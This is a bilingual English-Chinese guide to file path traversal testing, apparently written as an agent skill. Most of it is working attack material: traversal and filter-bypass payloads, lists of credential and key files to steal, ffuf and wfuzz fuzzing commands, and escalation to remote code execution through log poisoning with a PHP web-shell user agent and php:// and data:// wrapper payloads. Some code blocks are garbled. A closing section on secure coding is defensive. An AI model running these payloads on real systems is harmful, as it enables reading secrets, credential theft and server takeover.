Back to Details

file-path-traversal

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

File Path Traversal Testing

文件路径遍历测试

Purpose

测试目的

Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.
识别并利用文件路径遍历(目录遍历)漏洞,这类漏洞允许攻击者读取服务器上的任意文件,可能包括敏感配置文件、凭据和源代码。当用户可控输入被直接传递给文件系统API且未经过适当验证时,就会出现此类漏洞。

Prerequisites

前置条件

Required Tools

所需工具

  • Web browser with developer tools
  • Burp Suite or OWASP ZAP
  • cURL for testing payloads
  • Wordlists for automation
  • ffuf or wfuzz for fuzzing
  • 带开发者工具的Web浏览器
  • Burp Suite 或 OWASP ZAP
  • 用于测试 payload 的 cURL
  • 用于自动化测试的字典表
  • 用于模糊测试的 ffuf 或 wfuzz

Required Knowledge

必备知识

  • HTTP request/response structure
  • Linux and Windows filesystem layout
  • Web application architecture
  • Basic understanding of file APIs
  • HTTP 请求/响应结构
  • Linux 和 Windows 文件系统布局
  • Web 应用架构
  • 文件API的基础理解

Outputs and Deliverables

输出成果

  1. Vulnerability Report - Identified traversal points and severity
  2. Exploitation Proof - Extracted file contents
  3. Impact Assessment - Accessible files and data exposure
  4. Remediation Guidance - Secure coding recommendations
  1. 漏洞报告 - 已识别的遍历点及风险等级
  2. 利用证明 - 提取到的文件内容
  3. 影响评估 - 可访问的文件及数据泄露情况
  4. 修复建议 - 安全编码规范

Core Workflow

核心工作流程

Phase 1: Understanding Path Traversal

第一阶段:理解路径遍历

Path traversal occurs when applications use user input to construct file paths:
php
// Vulnerable PHP code example
$template = "blue.php";
if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
    $template = $_COOKIE['template'];
}
include("/home/user/templates/" . $template);
Attack principle:
  • ../
    sequence moves up one directory
  • Chain multiple sequences to reach root
  • Access files outside intended directory
Impact:
  • Confidentiality - Read sensitive files
  • Integrity - Write/modify files (in some cases)
  • Availability - Delete files (in some cases)
  • Code Execution - If combined with file upload or log poisoning
当应用程序使用用户输入来构造文件路径时,就会出现路径遍历问题:
php
// Vulnerable PHP code example
$template = "blue.php";
if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
    $template = $_COOKIE['template'];
}
include("/home/user/templates/" . $template);
攻击原理:
  • ../
    序列用于向上跳转一级目录
  • 串联多个序列可到达根目录
  • 访问预期目录之外的文件
影响:
  • 保密性 - 读取敏感文件
  • 完整性 - 在某些情况下可写入/修改文件
  • 可用性 - 在某些情况下可删除文件
  • 代码执行 - 若结合文件上传或日志投毒漏洞

Phase 2: Identifying Traversal Points

第二阶段:识别遍历点

Map application for potential file operations:
bash
undefined
梳理应用程序中可能存在文件操作的位置:
bash
undefined

Parameters that often handle files

通常处理文件的参数

?file= ?path= ?page= ?template= ?filename= ?doc= ?document= ?folder= ?dir= ?include= ?src= ?source= ?content= ?view= ?download= ?load= ?read= ?retrieve=

Common vulnerable functionality:
- Image loading: `/image?filename=23.jpg`
- Template selection: `?template=blue.php`
- File downloads: `/download?file=report.pdf`
- Document viewers: `/view?doc=manual.pdf`
- Include mechanisms: `?page=about`
?file= ?path= ?page= ?template= ?filename= ?doc= ?document= ?folder= ?dir= ?include= ?src= ?source= ?content= ?view= ?download= ?load= ?read= ?retrieve=

常见的易受攻击功能:
- 图片加载:`/image?filename=23.jpg`
- 模板选择:`?template=blue.php`
- 文件下载:`/download?file=report.pdf`
- 文档查看器:`/view?doc=manual.pdf`
- 包含机制:`?page=about`

Phase 3: Basic Exploitation Techniques

第三阶段:基础利用技术

Simple Path Traversal

简单路径遍历

bash
undefined
bash
undefined

Basic Linux traversal

Basic Linux traversal

../../../etc/passwd ../../../../etc/passwd ../../../../../etc/passwd ../../../../../../etc/passwd
../../../etc/passwd ../../../../etc/passwd ../../../../../etc/passwd ../../../../../../etc/passwd

Windows traversal

Windows traversal

......\windows\win.ini ........\windows\system32\drivers\etc\hosts
......\windows\win.ini ........\windows\system32\drivers\etc\hosts

URL encoded

URL encoded

..%2F..%2F..%2Fetc%2Fpasswd ..%252F..%252F..%252Fetc%252Fpasswd # Double encoding
..%2F..%2F..%2Fetc%2Fpasswd ..%252F..%252F..%252Fetc%252Fpasswd # Double encoding

Test payloads with curl

Test payloads with curl

curl "http://target.com/image?filename=../../../etc/passwd" curl "http://target.com/download?file=....//....//....//etc/passwd"
undefined
curl "http://target.com/image?filename=../../../etc/passwd" curl "http://target.com/download?file=....//....//....//etc/passwd"
undefined

Absolute Path Injection

绝对路径注入

bash
undefined
bash
undefined

Direct absolute path (Linux)

Direct absolute path (Linux)

/etc/passwd /etc/shadow /etc/hosts /proc/self/environ
/etc/passwd /etc/shadow /etc/hosts /proc/self/environ

Direct absolute path (Windows)

Direct absolute path (Windows)

C:\windows\win.ini C:\windows\system32\drivers\etc\hosts C:\boot.ini
undefined
C:\windows\win.ini C:\windows\system32\drivers\etc\hosts C:\boot.ini
undefined

Phase 4: Bypass Techniques

第四阶段:绕过技术

Bypass Stripped Traversal Sequences

绕过被剥离的遍历序列

bash
undefined
bash
undefined

When ../ is stripped once

When ../ is stripped once

....//....//....//etc/passwd ..../..../..../etc/passwd
....//....//....//etc/passwd ..../..../..../etc/passwd

Nested traversal

Nested traversal

..././..././..././etc/passwd ....//....//etc/passwd
..././..././..././etc/passwd ....//....//etc/passwd

Mixed encoding

Mixed encoding

..%2f..%2f..%2fetc/passwd %2e%2e/%2e%2e/%2e%2e/etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
undefined
..%2f..%2f..%2fetc/passwd %2e%2e/%2e%2e/%2e%2e/etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
undefined

Bypass Extension Validation

绕过扩展名验证

bash
undefined
bash
undefined

Null byte injection (older PHP versions)

Null byte injection (older PHP versions)

../../../etc/passwd%00.jpg ../../../etc/passwd%00.png
../../../etc/passwd%00.jpg ../../../etc/passwd%00.png

Path truncation

Path truncation

../../../etc/passwd...............................
../../../etc/passwd...............................

Double extension

Double extension

../../../etc/passwd.jpg.php
undefined
../../../etc/passwd.jpg.php
undefined

Bypass Base Directory Validation

绕过基础目录验证

bash
undefined
bash
undefined

When path must start with expected directory

When path must start with expected directory

/var/www/images/../../../etc/passwd
/var/www/images/../../../etc/passwd

Expected path followed by traversal

Expected path followed by traversal

images/../../../etc/passwd
undefined
images/../../../etc/passwd
undefined

Bypass Blacklist Filters

绕过黑名单过滤

bash
undefined
bash
undefined

Unicode/UTF-8 encoding

Unicode/UTF-8 encoding

..%c0%af..%c0%af..%c0%afetc/passwd ..%c1%9c..%c1%9c..%c1%9cetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd ..%c1%9c..%c1%9c..%c1%9cetc/passwd

Overlong UTF-8 encoding

Overlong UTF-8 encoding

%c0%2e%c0%2e%c0%af
%c0%2e%c0%2e%c0%af

URL encoding variations

URL encoding variations

%2e%2e/ %2e%2e%5c ..%5c ..%255c
%2e%2e/ %2e%2e%5c ..%5c ..%255c

Case variations (Windows)

Case variations (Windows)

....\....\etc\passwd
undefined
....\....\etc\passwd
undefined

Phase 5: Linux Target Files

第五阶段:Linux目标文件

High-value files to target:
bash
undefined
高价值目标文件:
bash
undefined

System files

System files

/etc/passwd # User accounts /etc/shadow # Password hashes (root only) /etc/group # Group information /etc/hosts # Host mappings /etc/hostname # System hostname /etc/issue # System banner
/etc/passwd # User accounts /etc/shadow # Password hashes (root only) /etc/group # Group information /etc/hosts # Host mappings /etc/hostname # System hostname /etc/issue # System banner

SSH files

SSH files

/root/.ssh/id_rsa # Root private key /root/.ssh/authorized_keys # Authorized keys /home/<user>/.ssh/id_rsa # User private keys /etc/ssh/sshd_config # SSH configuration
/root/.ssh/id_rsa # Root private key /root/.ssh/authorized_keys # Authorized keys /home/<user>/.ssh/id_rsa # User private keys /etc/ssh/sshd_config # SSH configuration

Web server files

Web server files

/etc/apache2/apache2.conf /etc/nginx/nginx.conf /etc/apache2/sites-enabled/000-default.conf /var/log/apache2/access.log /var/log/apache2/error.log /var/log/nginx/access.log
/etc/apache2/apache2.conf /etc/nginx/nginx.conf /etc/apache2/sites-enabled/000-default.conf /var/log/apache2/access.log /var/log/apache2/error.log /var/log/nginx/access.log

Application files

Application files

/var/www/html/config.php /var/www/html/wp-config.php /var/www/html/.htaccess /var/www/html/web.config
/var/www/html/config.php /var/www/html/wp-config.php /var/www/html/.htaccess /var/www/html/web.config

Process information

Process information

/proc/self/environ # Environment variables /proc/self/cmdline # Process command line /proc/self/fd/0 # File descriptors /proc/version # Kernel version
/proc/self/environ # Environment variables /proc/self/cmdline # Process command line /proc/self/fd/0 # File descriptors /proc/version # Kernel version

Common application configs

Common application configs

/etc/mysql/my.cnf /etc/postgresql/*/postgresql.conf /opt/lampp/etc/httpd.conf
undefined
/etc/mysql/my.cnf /etc/postgresql/*/postgresql.conf /opt/lampp/etc/httpd.conf
undefined

Phase 6: Windows Target Files

第六阶段:Windows目标文件

Windows-specific targets:
bash
undefined
Windows系统专属目标文件:
bash
undefined

System files

System files

C:\windows\win.ini C:\windows\system.ini C:\boot.ini C:\windows\system32\drivers\etc\hosts C:\windows\system32\config\SAM C:\windows\repair\SAM
C:\windows\win.ini C:\windows\system.ini C:\boot.ini C:\windows\system32\drivers\etc\hosts C:\windows\system32\config\SAM C:\windows\repair\SAM

IIS files

IIS files

C:\inetpub\wwwroot\web.config C:\inetpub\logs\LogFiles\W3SVC1\
C:\inetpub\wwwroot\web.config C:\inetpub\logs\LogFiles\W3SVC1\

Configuration files

Configuration files

C:\xampp\apache\conf\httpd.conf C:\xampp\mysql\data\mysql\user.MYD C:\xampp\passwords.txt C:\xampp\phpmyadmin\config.inc.php
C:\xampp\apache\conf\httpd.conf C:\xampp\mysql\data\mysql\user.MYD C:\xampp\passwords.txt C:\xampp\phpmyadmin\config.inc.php

User files

User files

C:\Users<user>.ssh\id_rsa C:\Users<user>\Desktop
C:\Documents and Settings<user>\
undefined
C:\Users<user>.ssh\id_rsa C:\Users<user>\Desktop
C:\Documents and Settings<user>\
undefined

Phase 7: Automated Testing

第七阶段:自动化测试

Using Burp Suite

使用Burp Suite

1. Capture request with file parameter
2. Send to Intruder
3. Mark file parameter value as payload position
4. Load path traversal wordlist
5. Start attack
6. Filter responses by size/content for success
1. Capture request with file parameter
2. Send to Intruder
3. Mark file parameter value as payload position
4. Load path traversal wordlist
5. Start attack
6. Filter responses by size/content for success

Using ffuf

使用ffuf

bash
undefined
bash
undefined

Basic traversal fuzzing

Basic traversal fuzzing

ffuf -u "http://target.com/image?filename=FUZZ"
-w /usr/share/wordlists/traversal.txt
-mc 200
ffuf -u "http://target.com/image?filename=FUZZ"
-w /usr/share/wordlists/traversal.txt
-mc 200

Fuzzing with encoding

Fuzzing with encoding

ffuf -u "http://target.com/page?file=FUZZ"
-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
-mc 200,500 -ac
undefined
ffuf -u "http://target.com/page?file=FUZZ"
-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
-mc 200,500 -ac
undefined

Using wfuzz

使用wfuzz

bash
undefined
bash
undefined

Traverse to /etc/passwd

Traverse to /etc/passwd

wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
--hc 404
"http://target.com/index.php?file=FUZZ"
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
--hc 404
"http://target.com/index.php?file=FUZZ"

With headers/cookies

With headers/cookies

wfuzz -c -z file,traversal.txt
-H "Cookie: session=abc123"
"http://target.com/load?path=FUZZ"
undefined
wfuzz -c -z file,traversal.txt
-H "Cookie: session=abc123"
"http://target.com/load?path=FUZZ"
undefined

Phase 8: LFI to RCE Escalation

第八阶段:从LFI到RCE的权限提升

Log Poisoning

日志投毒

bash
undefined
bash
undefined

Inject PHP code into logs

Inject PHP code into logs

curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

Include Apache log file

Include Apache log file

curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"

Include auth.log (SSH)

Include auth.log (SSH)

First: ssh '<?php system($_GET["cmd"]); ?>'@target.com

First: ssh '<?php system($_GET["cmd"]); ?>'@target.com

curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
undefined
curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
undefined

Proc/self/environ

利用/proc/self/environ

bash
undefined
bash
undefined

Inject via User-Agent

Inject via User-Agent

curl -A "<?php system('id'); ?>"
"http://target.com/page?file=/proc/self/environ"
curl -A "<?php system('id'); ?>"
"http://target.com/page?file=/proc/self/environ"

With command parameter

With command parameter

curl -A "<?php system(\$_GET['c']); ?>"
"http://target.com/page?file=/proc/self/environ&c=whoami"
undefined
curl -A "<?php system(\$_GET['c']); ?>"
"http://target.com/page?file=/proc/self/environ&c=whoami"
undefined

PHP Wrapper Exploitation

PHP包装器利用

bash
undefined
bash
undefined

php://filter - Read source code as base64

php://filter - Read source code as base64

curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"
curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"

php://input - Execute POST data as PHP

php://input - Execute POST data as PHP

curl -X POST -d "<?php system('id'); ?>"
"http://target.com/page?file=php://input"
curl -X POST -d "<?php system('id'); ?>"
"http://target.com/page?file=php://input"

data:// - Execute inline PHP

data:// - Execute inline PHP

curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"
curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"

expect:// - Execute system commands

expect:// - Execute system commands

curl "http://target.com/page?file=expect://id"
undefined
curl "http://target.com/page?file=expect://id"
undefined

Phase 9: Testing Methodology

第九阶段:测试方法论

Structured testing approach:
bash
undefined
结构化测试步骤:
bash
undefined

Step 1: Identify potential parameters

Step 1: Identify potential parameters

Look for file-related functionality

Look for file-related functionality

Step 2: Test basic traversal

Step 2: Test basic traversal

../../../etc/passwd
../../../etc/passwd

Step 3: Test encoding variations

Step 3: Test encoding variations

..%2F..%2F..%2Fetc%2Fpasswd %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%2F..%2F..%2Fetc%2Fpasswd %2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

Step 4: Test bypass techniques

Step 4: Test bypass techniques

....//....//....//etc/passwd ..;/..;/..;/etc/passwd
....//....//....//etc/passwd ..;/..;/..;/etc/passwd

Step 5: Test absolute paths

Step 5: Test absolute paths

/etc/passwd
/etc/passwd

Step 6: Test with null bytes (legacy)

Step 6: Test with null bytes (legacy)

../../../etc/passwd%00.jpg
../../../etc/passwd%00.jpg

Step 7: Attempt wrapper exploitation

Step 7: Attempt wrapper exploitation

php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=index.php

Step 8: Attempt log poisoning for RCE

Step 8: Attempt log poisoning for RCE

undefined
undefined

Phase 10: Prevention Measures

第十阶段:防范措施

Secure coding practices:
php
// PHP: Use basename() to strip paths
$filename = basename($_GET['file']);
$path = "/var/www/files/" . $filename;

// PHP: Validate against whitelist
$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
if (in_array($_GET['file'], $allowed)) {
    include("/var/www/files/" . $_GET['file']);
}

// PHP: Canonicalize and verify base path
$base = "/var/www/files/";
$realBase = realpath($base);
$userPath = $base . $_GET['file'];
$realUserPath = realpath($userPath);

if ($realUserPath && strpos($realUserPath, $realBase) === 0) {
    include($realUserPath);
}
python
undefined
安全编码实践:
php
// PHP: Use basename() to strip paths
$filename = basename($_GET['file']);
$path = "/var/www/files/" . $filename;

// PHP: Validate against whitelist
$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
if (in_array($_GET['file'], $allowed)) {
    include("/var/www/files/" . $_GET['file']);
}

// PHP: Canonicalize and verify base path
$base = "/var/www/files/";
$realBase = realpath($base);
$userPath = $base . $_GET['file'];
$realUserPath = realpath($userPath);

if ($realUserPath && strpos($realUserPath, $realBase) === 0) {
    include($realUserPath);
}
python
undefined

Python: Use os.path.realpath() and validate

Python: Use os.path.realpath() and validate

import os
def safe_file_access(base_dir, filename): # Resolve to absolute path base = os.path.realpath(base_dir) file_path = os.path.realpath(os.path.join(base, filename))
# Verify file is within base directory
if file_path.startswith(base):
    return open(file_path, 'r').read()
else:
    raise Exception("Access denied")
undefined
import os
def safe_file_access(base_dir, filename): # Resolve to absolute path base = os.path.realpath(base_dir) file_path = os.path.realpath(os.path.join(base, filename))
# Verify file is within base directory
if file_path.startswith(base):
    return open(file_path, 'r').read()
else:
    raise Exception("Access denied")
undefined

Quick Reference

快速参考

Common Payloads

常见Payload

PayloadTarget
../../../etc/passwd
Linux password file
..\..\..\..\windows\win.ini
Windows INI file
....//....//....//etc/passwd
Bypass simple filter
/etc/passwd
Absolute path
php://filter/convert.base64-encode/resource=config.php
Source code
PayloadTarget
../../../etc/passwd
Linux密码文件
..\..\..\..\windows\win.ini
Windows配置文件
....//....//....//etc/passwd
绕过简单过滤
/etc/passwd
绝对路径
php://filter/convert.base64-encode/resource=config.php
读取源代码

Target Files

目标文件

OSFilePurpose
Linux
/etc/passwd
User accounts
Linux
/etc/shadow
Password hashes
Linux
/proc/self/environ
Environment vars
Windows
C:\windows\win.ini
System config
Windows
C:\boot.ini
Boot config
Web
wp-config.php
WordPress DB creds
操作系统文件路径用途
Linux
/etc/passwd
用户账户信息
Linux
/etc/shadow
密码哈希值
Linux
/proc/self/environ
环境变量
Windows
C:\windows\win.ini
系统配置
Windows
C:\boot.ini
启动配置
Web应用
wp-config.php
WordPress数据库凭据

Encoding Variants

编码变体

TypeExample
URL Encoding
%2e%2e%2f
= 
../
Double Encoding
%252e%252e%252f
= 
../
Unicode
%c0%af
= 
/
Null Byte
%00
类型示例
URL编码
%2e%2e%2f
= 
../
双重编码
%252e%252e%252f
= 
../
Unicode编码
%c0%af
= 
/
空字节
%00

Constraints and Limitations

约束与限制

Permission Restrictions

权限限制

  • Cannot read files application user cannot access
  • Shadow file requires root privileges
  • Many files have restrictive permissions
  • 无法读取应用程序用户无权限访问的文件
  • Shadow文件仅root用户可读取
  • 许多文件设置了严格的访问权限

Application Restrictions

应用限制

  • Extension validation may limit file types
  • Base path validation may restrict scope
  • WAF may block common payloads
  • 扩展名验证可能限制可访问的文件类型
  • 基础路径验证可能限制访问范围
  • Web应用防火墙(WAF)可能拦截常见Payload

Testing Considerations

测试注意事项

  • Respect authorized scope
  • Avoid accessing genuinely sensitive data
  • Document all successful access
  • 遵守授权测试范围
  • 避免访问真正敏感的数据
  • 记录所有成功访问的情况

Troubleshooting

故障排除

ProblemSolutions
No response differenceTry encoding, blind traversal, different files
Payload blockedUse encoding variants, nested sequences, case variations
Cannot escalate to RCECheck logs, PHP wrappers, file upload, session poisoning
问题解决方案
响应无差异尝试编码变体、盲遍历、不同的目标文件
Payload被拦截使用编码变体、嵌套序列、大小写变体
无法提升至RCE检查日志、PHP包装器、文件上传、会话投毒等方式

When to Use

使用场景

This skill is applicable to execute the workflow or actions described in the overview.
当需要执行本概述中描述的工作流程或操作时,适用本技能。